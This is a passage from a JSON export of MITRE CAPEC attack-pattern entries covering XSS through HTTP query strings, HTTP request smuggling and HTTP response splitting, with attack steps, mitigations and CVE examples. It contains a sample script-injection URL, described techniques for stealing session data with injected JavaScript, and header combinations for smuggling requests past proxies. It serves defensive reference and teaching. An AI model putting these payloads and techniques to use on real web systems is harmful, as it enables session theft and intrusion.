CVE-2016-0353"},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"565"},{"CWE_ID":"302"},{"CWE_ID":"311"},{"CWE_ID":"113"},{"CWE_ID":"539"},{"CWE_ID":"20"},{"CWE_ID":"315"},{"CWE_ID":"384"},{"CWE_ID":"472"},{"CWE_ID":"602"},{"CWE_ID":"642"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances, Payload_Activation_Impact, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Execution_Flow, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Example_Instances, Related_Weaknesses"}]}},"32":{"ID":"32","Name":"XSS Through HTTP Query Strings","Abstraction":"Detailed","Status":"Draft","Description":"An adversary embeds malicious script code in the parameters of an HTTP query string and convinces a victim to submit the HTTP request that contains the query string to a vulnerable web application. The web application then procedes to use the values parameters without properly validation them first and generates the HTML code that will be executed by the victim\'s browser.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"591"},{"Nature":"ChildOf","CAPEC_ID":"588"},{"Nature":"ChildOf","CAPEC_ID":"592"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Spider] Using a browser or an automated tool, an attacker follows all public links on a web site. They record all the links they find.","Technique":["Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.","Use a browser to manually explore the website and analyze how it is constructed. Many browser\'s plugins are available to facilitate the analysis or automate the URL discovery."]},{"Step":"2","Phase":"Experiment","Description":"[Attempt variations on input parameters] Possibly using an automated tool, an attacker requests variations on the URLs they spidered before. They send parameters that include variations of payloads. They record all the responses from the server that include unmodified versions of their script.","Technique":["Use a list of XSS probe strings to inject in parameters of known URLs. If possible, the probe strings contain a unique identifier.","Use a proxy tool to record results of manual input of XSS probes in known URLs."]},{"Step":"3","Phase":"Exploit","Description":"[Steal session IDs, credentials, page content, etc.] As the attacker succeeds in exploiting the vulnerability, they can choose to steal user\'s credentials in order to reuse or to analyze them later on.","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and sends document information to the attacker.","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute appropriately."]},{"Step":"4","Phase":"Exploit","Description":"[Forceful browsing] When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user\'s current network (Internet or not).","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and performs actions on the same web site","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities)."]},{"Step":"5","Phase":"Exploit","Description":"[Content spoofing] By manipulating the content, the attacker targets the information that the user would like to get from the website.","Technique":"Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and exposes attacker-modified invalid information to the user on the current web page."}]},"Prerequisites":{"Prerequisite":"Target client software must allow scripting such as JavaScript. Server software must allow display of remote generated HTML without sufficient input or output validation."},"Skills_Required":{"Skill":["To place malicious payload on server via HTTP",{"Level":"Low"},"Exploiting any information gathered by HTTP Query on script host",{"Level":"High"}]},"Resources_Required":{"Resource":"Ability to send HTTP post to scripting host and collect output"},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["Design: Use browser technologies that do not allow client side scripting.","Design: Utilize strict type, character, and encoding enforcement","Design: Server side developers should not proxy content via XHR or other means, if a http proxy for remote content is setup on the server side, the client\'s browser has no way of discerning where the data is originating from.","Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.","Implementation: Perform input validation for all remote content, including remote and user-generated content","Implementation: Perform output validation for all remote content.","Implementation: Disable scripting languages such as JavaScript in browser","Implementation: Session tokens for specific host","Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this.","Implementation: Privileges are constrained, if a script is loaded, ensure system runs in chroot jail or other limited authority mode"]},"Example_Instances":{"Example":["http://user:host@example.com:8080/oradb<script>alert(\'Hi\')<\/script>",{"p":["Web applications that accept name value pairs in a HTTP Query string are inherently at risk to any value (or name for that matter) that an attacker would like to enter in the query string. This can be done manually via web browser or trivially scripted to post the query string to multiple sites. In the latter case, in the instance of many sites using similar infrastructure with predictable http queries being accepted and operated on (such as blogging software, Google applications, and so on), a single malicious payload can be scripted to target a wide variety of sites.","Web 2.0 type sites like Technorati and del.icio.us rely on user generated content like tags to build http links that are displayed to other users. del.icio.us allows users to identify sites, tag them with metadata and provide URL, descriptions and more data. This data is then echoed back to any other web browser that is interested in the link. If the data is not validated by the del.icio.us site properly then an arbitrary code can be added into the standard http string sent to del.icio.us by the attacker, for example formatted as normal content with a URL and description and tagged as Java, and available to be clicked on (and executed by) any user browsing for Java content that clicks on this trojaned content."]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"80"}},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Phases, Description Summary, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["Embedding Scripts in HTTP Query Strings",{"Date":"2017-05-01"}]}},"33":{"ID":"33","Name":"HTTP Request Smuggling","Abstraction":"Detailed","Status":"Stable","Description":{"p":["An adversary abuses the flexibility and discrepancies in the parsing and interpretation of HTTP Request messages using various HTTP headers and message sizes (denoted by the end of message signaled by a given HTTP header) by different intermediary HTTP agents (e.g., load balancer, reverse proxy, web caching proxies, application firewalls, etc.) to secretly send unauthorized and malicious HTTP requests to a back-end HTTP agent (e.g., web server).","See CanPrecede relationships for possible consequences."]},"Extended_Description":{"p":["A maliciously crafted HTTP request, which contains a second secretly embedded HTTP request is interpreted by an intermediary web proxy as single benign HTTP request, is forwarded to a back-end server, that interprets and parses the HTTP request as two authorized benign HTTP requests bypassing security controls.","This attack usually involves the misuse of the HTTP headers: Content-Length and Transfer-Encoding. These abuses are discussed in RFC 2616 #4.4.3 and section #4.2 and are related to ordering and precedence of these headers. [REF-38]","This attack is usually the result of the usage of outdated or incompatible HTTP protocol versions in the HTTP agents.","This differs from CAPEC-273 HTTP Response Smuggling, which is usually an attempt to compromise a client agent (e.g., web browser) by sending malicious content in HTTP responses from back-end HTTP infrastructure. HTTP Request Smuggling is an attempt to compromise a",{"em":"back-end HTTP agent"},"HTTP Splitting (CAPEC-105 and CAPEC-34) is different from HTTP Smuggling due to the fact that during implementation of asynchronous requests, HTTP Splitting requires the embedding/injection of arbitrary HTML headers and content through user input into browser cookies or Ajax web/browser object parameters like XMLHttpRequest."]},"Alternate_Terms":{"Alternate_Term":{"Term":"HTTP Desync","Description":"Modification/manipulation of HTTP message headers and body parameters to disrupt and interfere in the interpretation and parsing of HTTP message lengths/boundaries for consecutive HTTP messages by HTTP agents in a HTTP chain or network path."}},"Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"220"},{"Nature":"PeerOf","CAPEC_ID":"273"},{"Nature":"CanPrecede","CAPEC_ID":"115"},{"Nature":"CanPrecede","CAPEC_ID":"141"},{"Nature":"CanPrecede","CAPEC_ID":"63"},{"Nature":"CanPrecede","CAPEC_ID":"593"},{"Nature":"CanPrecede","CAPEC_ID":"148"},{"Nature":"CanPrecede","CAPEC_ID":"154"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey network to identify target] The adversary performs network reconnaissance by monitoring relevant traffic to identify the network path and parsing of the HTTP messages with the goal of identifying potential targets.","Technique":"Scan networks to fingerprint HTTP infrastructure and monitor HTTP traffic to identify HTTP network path with a tool such as a Network Protocol Analyzer."},{"Step":"1","Phase":"Experiment","Description":"[Identify vulnerabilities in targeted HTTP infrastructure and technologies] The adversary sends a variety of benign/ambiguous HTTP requests to observe responses from HTTP infrastructure in order to identify differences/discrepancies in the interpretation and parsing of HTTP requests by examining supported HTTP protocol versions, message sizes, and HTTP headers."},{"Step":"2","Phase":"Experiment","Description":"[Cause differential HTTP responses by experimenting with identified HTTP Request vulnerabilities] The adversary sends maliciously crafted HTTP requests to interfere with the parsing of intermediary and back-end HTTP infrastructure, followed by normal/benign HTTP request from the adversary or a random user. The intended consequences of the malicious HTTP requests will be observed in the HTTP infrastructure response to the normal/benign HTTP request to confirm applicability of identified vulnerabilities in the adversary\'s plan of attack.","Technique":["Continue the monitoring of HTTP traffic.",{"p":["Utilize various combinations of HTTP Headers within a single HTTP Request such as: Content-Length & Transfer-Encoding (CL;TE), Transfer-Encoding & Content-Length (TE;CL), or double Transfer-Encoding (TE;TE), so that additional embedded requests or data in the body of the original request are unprocessed and treated as part of subsequent requests by the intended target HTTP agent.","From these HTTP Header combinations the adversary observes any timing delays (usually in the form of HTTP 404 Error response) or any other unintended consequences."],"ul":{"li":["For CL;TE and TE;CL HTTP header combinations, the first HTTP agent, in the HTTP message path that receives the HTTP request, takes precedence or only processes one header but not the other, while the second/final HTTP agent processes the opposite header, allowing for embedded HTTP requests to be ignored and smuggled to the intended target HTTP agent.","For TE;TE HTTP headers combination, all HTTP agents in HTTP message path process Transfer-Encoding header, however, adversary obfuscation (see Mitigations for details) of one of the Transfer-Encoding headers, by not adhering strictly to the protocol specification, can cause it to be unprocessed/ignored by a designated HTTP agent, hence allowing embedded HTTP requests to be smuggled. ."]}},{"p":["Construct a very large HTTP request using multiple Content-Length headers of various data lengths that can potentially cause subsequent requests to be ignored by an intermediary HTTP agent (firewall) and/or eventually parsed separately by the target HTTP agent (web server).","Note that most modern HTTP infrastructure reject HTTP requests with multiple Content-Length headers."]},"Follow an unrecognized (sometimes a RFC compliant) HTTP header with a subsequent HTTP request to potentially cause the HTTP request to be ignored and interpreted as part of the preceding HTTP request."]},{"Step":"1","Phase":"Exploit","Description":"[Perform HTTP Request Smuggling attack] Using knowledge discovered in the experiment section above, smuggle a message to cause one of the consequences.","Technique":"Leverage techniques identified in the Experiment Phase."}]},"Prerequisites":{"Prerequisite":["An additional intermediary HTTP agent such as an application firewall or a web caching proxy between the adversary and the second agent such as a web server, that sends multiple HTTP messages over same network connection.","Differences in the way the two HTTP agents parse and interpret HTTP requests and its headers.","HTTP agents running on HTTP/1.1 that allow for Keep Alive mode, Pipelined queries, and Chunked queries and responses."]},"Skills_Required":{"Skill":["Detailed knowledge on HTTP protocol: request and response messages structure and usage of specific headers.",{"Level":"Medium"},"Detailed knowledge on how specific HTTP agents receive, send, process, interpret, and parse a variety of HTTP messages and headers.",{"Level":"Medium"},"Possess knowledge on the exact details in the discrepancies between several targeted HTTP agents in path of an HTTP message in parsing its message structure and individual headers.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Tools capable of crafting malicious HTTP messages and monitoring HTTP message responses."},"Indicators":{"Indicator":"Differences in requests processed by the two agents. This requires careful monitoring or a capable log analysis tool."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Design: evaluate HTTP agents prior to deployment for parsing/interpretation discrepancies.","Configuration: front-end HTTP agents notice ambiguous requests.","Configuration: back-end HTTP agents reject ambiguous requests and close the network connection.","Configuration: Disable reuse of back-end connections.","Configuration: Use HTTP/2 for back-end connections.","Configuration: Use the same web server software for front-end and back-end server.","Implementation: Utilize a Web Application Firewall (WAF) that has built-in mitigation to detect abnormal requests/responses.","Configuration: Prioritize Transfer-Encoding header over Content-Length, whenever an HTTP message contains both.","Configuration: Disallow HTTP messages with both Transfer-Encoding and Content-Length or Double Content-Length Headers.","Configuration: Disallow Malformed/Invalid Transfer-Encoding Headers used in obfuscation, such as:",{"ul":{"li":["Headers with no space before the value \u201cchunked\u201d","Headers with extra spaces","Headers beginning with trailing characters","Headers providing a value \u201cchunk\u201d instead of \u201cchunked\u201d (the server normalizes this as chunked encoding)","Headers with multiple spaces before the value \u201cchunked\u201d","Headers with quoted values (whether single or double quotations)","Headers with CRLF characters before the value \u201cchunked\u201d","Values with invalid characters"]}},"Configuration: Install latest vendor security patches available for both intermediary and back-end HTTP infrastructure (i.e. proxies and web servers)","Configuration: Ensure that HTTP infrastructure in the chain or network path utilize a strict uniform parsing process.","Implementation: Utilize intermediary HTTP infrastructure capable of filtering and/or sanitizing user-input."]},"Example_Instances":{"Example":[{"p":"When using Haproxy 1.5.3 version as front-end proxy server with with Node.js version 14.13.1 or 12.19.0 as the back-end web server it is possible to use two same header fields for example: two Transfer-Encoding, Transfer-Encoding: chunked and Transfer-Encoding: chunked-false, to bypass Haproxy /flag URI restriction and receive the Haproxy flag value, since Node.js identifies the first header but ignores the second header. See also: CVE-2020-8287"},{"p":"When using Sun Java System Web Proxy Server 3.x or 4.x in conjunction with Sun ONE/iPlanet 6.x, Sun Java System Application Server 7.x or 8.x, it is possible to bypass certain application firewall protections, hijack web sessions, perform Cross Site Scripting or poison the web proxy cache using HTTP Request Smuggling. Differences in the way HTTP requests are parsed by the Proxy Server and the Application Server enable malicious requests to be smuggled through to the Application Server, thereby exposing the Application Server to aforementioned attacks. See also: CVE-2006-6276"},{"p":"Apache server 2.0.45 and version before 1.3.34, when used as a proxy, easily lead to web cache poisoning and bypassing of application firewall restrictions because of non-standard HTTP behavior. Although the HTTP/1.1 specification clearly states that a request with both \\"Content-Length\\" and a \\"Transfer-Encoding: chunked\\" headers is invalid, vulnerable versions of Apache accept such requests and reassemble the ones with \\"Transfer-Encoding: chunked\\" header without replacing the existing \\"Content-Length\\" header or adding its own. This leads to HTTP Request Smuggling using a request with a chunked body and a header with \\"Content-Length: 0\\". See also: CVE-2005-2088"}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"444"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"26","Entry_Name":"HTTP Request Smuggling"}},"References":{"Reference":[{"External_Reference_ID":"REF-38"},{"External_Reference_ID":"REF-117"},{"External_Reference_ID":"REF-617"},{"External_Reference_ID":"REF-672"},{"External_Reference_ID":"REF-673"},{"External_Reference_ID":"REF-674"},{"External_Reference_ID":"REF-678"},{"External_Reference_ID":"REF-681"},{"External_Reference_ID":"REF-682"},{"External_Reference_ID":"REF-683"},{"External_Reference_ID":"REF-684"}]},"Notes":{"Note":["HTTP Splitting \u2013 \\"the act of forcing a sender of (HTTP) messages to emit data stream consisting of more messages than the sender\u2019s intension. The messages sent are 100% valid and RFC compliant\\" [REF-117].",{"Type":"Terminology"},"HTTP Smuggling \u2013 \\"the act of forcing a sender of (HTTP) messages to emit data stream which may be parsed as a different set of messages (i.e. dislocated message boundaries) than the sender\u2019s intention. This is done by virtue of forcing the sender to emit non-standard messages which can be interpreted in more than one way\\" [REF-117].",{"Type":"Terminology"},"HTTP Smuggling is an evolution of previous HTTP Splitting techniques which are commonly remediated against.",{"Type":"Relationship"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Attack_Patterns, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated @Status, Alternate_Terms, Consequences, Description, Example_Instances, Execution_Flow, Extended_Description, Indicators, Mitigations, Notes, Prerequisites, References, Related_Attack_Patterns, Related_Weaknesses, Resources_Required, Skills_Required"}]}},"34":{"ID":"34","Name":"HTTP Response Splitting","Abstraction":"Detailed","Status":"Stable","Description":{"p":["An adversary manipulates and injects malicious content, in the form of secret unauthorized HTTP responses, into a single HTTP response from a vulnerable or compromised back-end HTTP agent (e.g., web server) or into an already spoofed HTTP response from an adversary controlled domain/site.","See CanPrecede relationships for possible consequences."]},"Extended_Description":{"p":["Malicious user input is injected into various standard and/or user defined HTTP headers within a HTTP Response through use of Carriage Return (CR), Line Feed (LF), Horizontal Tab (HT), Space (SP) characters as well as other valid/RFC compliant special characters, and unique character encoding.","A single HTTP response ends up being split as two or more HTTP responses by the targeted client HTTP agent parsing the original maliciously manipulated HTTP response. This allows malicious HTTP responses to bypass security controls in order to implement malicious actions and provide malicious content that allows access to sensitive data and to compromise applications and users. This is performed by the abuse of interpretation and parsing discrepancies in different intermediary HTTP agents (load balancer, reverse proxy, web caching proxies, application firewalls, etc.) or client HTTP agents (e.g., web browser) in the path of the malicious HTTP responses.","This attack is usually the result of the usage of outdated or incompatible HTTP protocol versions as well as lack of syntax checking and filtering of user input in the HTTP agents receiving HTTP messages in the path.","This differs from CAPEC-105 HTTP Request Splitting, which is usually an attempt to compromise a back-end HTTP agent via HTTP Request messages. HTTP Response Splitting is an attempt to compromise a",{"em":"client agent (e.g., web browser)"},"HTTP Smuggling (CAPEC-33 and CAPEC-273) is different from HTTP Splitting due to the fact it relies upon discrepancies in the interpretation of various HTTP Headers and message sizes and not solely user input of special characters and character encoding. HTTP Smuggling was established to circumvent mitigations against HTTP Request Splitting techniques."]},"Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"220"},{"Nature":"PeerOf","CAPEC_ID":"105"},{"Nature":"CanPrecede","CAPEC_ID":"115"},{"Nature":"CanPrecede","CAPEC_ID":"141"},{"Nature":"CanPrecede","CAPEC_ID":"63"},{"Nature":"CanPrecede","CAPEC_ID":"593"},{"Nature":"CanPrecede","CAPEC_ID":"148"},{"Nature":"CanPrecede","CAPEC_ID":"154"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey network to identify target] The adversary performs network reconnaissance by monitoring relevant traffic to identify the network path and parsing of the HTTP messages with the goal of identifying potential targets","Technique":"Scan networks to fingerprint HTTP infrastructure and monitor HTTP traffic to identify HTTP network path with a tool such as a Network Protocol Analyzer."},{"Step":"1","Phase":"Experiment","Description":"[Identify vulnerabilities in targeted HTTP infrastructure and technologies] The adversary sends a variety of benign/ambiguous HTTP requests to observe responses from HTTP infrastructure in order to identify differences/discrepancies in the interpretation and parsing of HTTP requests by examining supported HTTP protocol versions, HTTP headers, syntax checking and input filtering."},{"Step":"2","Phase":"Experiment","Description":"[Cause differential HTTP responses by experimenting with identified HTTP Request vulnerabilities] The adversary sends maliciously crafted HTTP request to back-end HTTP infrastructure to inject adversary data (in the form of HTTP headers with custom strings and embedded web scripts and objects) into HTTP responses (intended for intermediary and/or front-end client/victim HTTP agents communicating with back-end HTTP infrastructure) for the purpose of interfering with the parsing of HTTP responses by intermediary and front-end client/victim HTTP agents. The intended consequences of the malicious HTTP request and the subsequent adversary injection and manipulation of HTTP responses to intermediary and front-end client/victim HTTP agents, will be observed to confirm applicability of identified vulnerabilities in the adversary\'s plan of attack.","Technique":["Continue the monitoring of HTTP traffic.",{"p":["Utilize different sequences of special characters (CR - Carriage Return, LF - Line Feed, HT - Horizontal Tab, SP - Space and etc.) to bypass filtering and back-end encoding and to embed:","to utilize additional special characters (e.g., > and <) filtered by the target HTTP agent.","Note that certain special characters and character encoding may be applicable only to intermediary and front-end agents with rare configurations or that are not RFC compliant."],"ul":{"li":["additional HTTP Requests with their own headers","malicious web scripts into parameters of HTTP Request headers (e.g., browser cookies like Set-Cookie or Ajax web/browser object parameters like XMLHttpRequest)","adversary chosen encoding (e.g., UTF-7)"]}},"Follow an unrecognized (sometimes a RFC compliant) HTTP header with a subsequent HTTP request to potentially cause the HTTP request to be ignored and interpreted as part of the preceding HTTP request."]},{"Step":"1","Phase":"Exploit","Description":"[Perform HTTP Response Splitting attack] Using knowledge discovered in the experiment section above, smuggle a message to cause one of the consequences.","Technique":"Leverage techniques identified in the Experiment Phase."}]},"Prerequisites":{"Prerequisite":["A vulnerable or compromised server or domain/site capable of allowing adversary to insert/inject malicious content that will appear in the server\'s response to target HTTP agents (e.g., proxies and users\' web browsers).","Differences in the way the two HTTP agents parse and interpret HTTP requests and its headers.","HTTP headers capable of being user-manipulated.","HTTP agents running on HTTP/1.0 or HTTP/1.1 that allow for Keep Alive mode, Pipelined queries, and Chunked queries and responses."]},"Skills_Required":{"Skill":["Detailed knowledge on HTTP protocol: request and response messages structure and usage of specific headers.",{"Level":"Medium"},"Detailed knowledge on how specific HTTP agents receive, send, process, interpret, and parse a variety of HTTP messages and headers.",{"Level":"Medium"},"Possess knowledge on the exact details in the discrepancies between several targeted HTTP agents in path of an HTTP message in parsing its message structure and individual headers.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Tools capable of monitoring HTTP messages, and crafting malicious HTTP messages and/or injecting malicious content into HTTP messages."},"Indicators":{"Indicator":"Differences in responses processed by the two agents with multiple responses to a single request in the web logs. This requires careful monitoring or a capable log analysis tool."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Design: evaluate HTTP agents prior to deployment for parsing/interpretation discrepancies.","Configuration: front-end HTTP agents notice ambiguous requests.","Configuration: back-end HTTP agents reject ambiguous requests and close the network connection.","Configuration: Disable reuse of back-end connections.","Configuration: Use HTTP/2 for back-end connections.","Configuration: Use the same web server software for front-end and back-end server.","Implementation: Utilize a Web Application Firewall (WAF) that has built-in mitigation to detect abnormal requests/responses.","Configuration: Install latest vendor security patches available for both intermediary and back-end HTTP infrastructure (i.e. proxies and web servers)","Configuration: Ensure that HTTP infrastructure in the chain or network path utilize a strict uniform parsing process.","Implementation: Utilize intermediary HTTP infrastructure capable of filtering and/or sanitizing user-input."]},"Example_Instances":{"Example":{"p":"In the PHP 5 session extension mechanism, a user-supplied session ID is sent back to the user within the Set-Cookie HTTP header. Since the contents of the user-supplied session ID are not validated, it is possible to inject arbitrary HTTP headers into the response body. This immediately enables HTTP Response Splitting by simply terminating the HTTP response header from within the session ID used in the Set-Cookie directive. See also: CVE-2006-0207"}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"74"},{"CWE_ID":"113"},{"CWE_ID":"138"},{"CWE_ID":"436"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"25","Entry_Name":"HTTP Response Splitting"}},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-117"},{"External_Reference_ID":"REF-617"},{"External_Reference_ID":"REF-680"}]},"Notes":{"Note":["HTTP Splitting \u2013 \\"the act of forcing a sender of (HTTP) messages to emit data stream consisting of more messages than the sender\u2019s intension. The messages sent are 100% valid and RFC compliant\\" [REF-117].",{"Type":"Terminology"},"HTTP Smuggling \u2013 \\"the act of forcing a sender of (HTTP) messages to emit data stream which may be parsed as a different set of messages (i.e. dislocated message boundaries) than the sender\u2019s intention. This is done by virtue of forcing the sender to emit non-standard messages which can be interpreted in more than one way\\" [REF-117].",{"Type":"Terminology"},"HTTP Smuggling is an evolution of previous HTTP Splitting techniques which are commonly remediated against.",{"Type":"Relationship"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Payload_Activation_Impact, Probing_Techniques, Related_Attack_Patterns, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated @Status, Consequences, Description, Example_Instances, Execution_Flow, Extended_Description, Indicators, Mitigations, Notes, Prerequisites, References, Related_Attack_Patterns, Related_Weaknesses, Resources_Required, Skills_Required, Taxonomy_Mappings"}]}},"35":{"ID":"35","Name":"Leverage Executable Code in Non-Executable Files","Abstraction":"Detailed","Status":"Draft","Description":"An attack of this type exploits a system\'s trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"636"},{"Nature":"PeerOf","CAPEC_ID":"23"},{"Nature":"PeerOf","CAPEC_ID":"75"}]},"Prerequisites":{"Prerequisite":"The attacker must have the ability to modify non-executable files consumed by the target software."},"Skills_Required":{"Skill":["To identify and execute against an over-privileged system interface",{"Level":"Low"}]},"Resources_Required":{"Resource":"Ability to communicate synchronously or asynchronously with server that publishes an over-privileged directory, program, or interface. Optionally, ability to capture output directly through synchronous communication or other method such as FTP."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Design: Enforce principle of least privilege","Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands.","Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables.","Implementation: Implement host integrity monitoring to detect any unwanted altering of configuration files.","Implementation: Ensure that files that are not required to execute, such as configuration files, are not over-privileged, i.e. not allowed to 